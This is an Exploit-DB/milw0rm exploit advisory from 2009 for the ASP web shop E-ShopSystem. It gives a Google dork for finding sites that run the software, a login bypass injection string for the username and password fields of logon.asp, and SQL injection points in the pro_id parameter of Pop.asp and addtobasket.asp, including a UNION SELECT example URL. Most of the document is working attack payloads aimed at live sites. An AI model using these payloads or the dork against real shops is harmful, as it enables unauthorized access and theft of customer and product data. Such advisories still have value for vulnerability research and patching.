E-ShopSystem - Authentication Bypass / SQL Injection

EDB-ID:

7872

CVE:

N/A




Platform:

ASP

Date:

2009-01-26


                          ||          ||   | ||        
                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
                  ( :   /    (_)    /           (   .  
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|     _                   __           __       __          ______     |
|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
|                  \ \____/ >> Kings of injection                      |
|                   \/___/                                             |
|                                                                      |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|


<<!>> Found by  :  Cyb3r-1sT

<<!>> C0ntact : cyb3r-1st [at] hotmail.com 
                   
<<!>> Groups : InjEctOr5 T3am 

=======================================================
+++++++++++++++++++ Script information+++++++++++++++++
=======================================================

<<->> script   : E-ShopSystem

<<->> download : http://www.shopsystem.co.il 

=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================

<<->> D0rk    : http://www.google.co.il/search?hl=iw&q=Powered+by+ShopSystem&start=0&sa=N

<<->> Exploit :>>>
                                <<->> bypass sql injectiom <<->>

                     :>>>>  http://www.site.me/logon.asp

                     >>> user : Gaza ' or ' Gaza=Victory--     
        
                     >>> pass : Gaza ' or ' Gaza=Victory-- 


<<->> Exploit <<->>               
                                 <<->> sql injection <<->>

                      :>>>>  http://www.site.me/Pop.asp?pro_id=[sql]
                      :>>>>  http://www.site.me//addtobasket.asp?pro_id=[sql] 

         Example : :>>>>  http://www.site.me/Pop.asp?pro_id=-1+union+select+product_id,1,2+from+products&ID=

=======================================================
++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
=======================================================

<<->> All freinds , all muslims , [ www.tryag.cc/cc ] , [ sec-code.com/vb ] , str0ke 

# milw0rm.com [2009-01-26]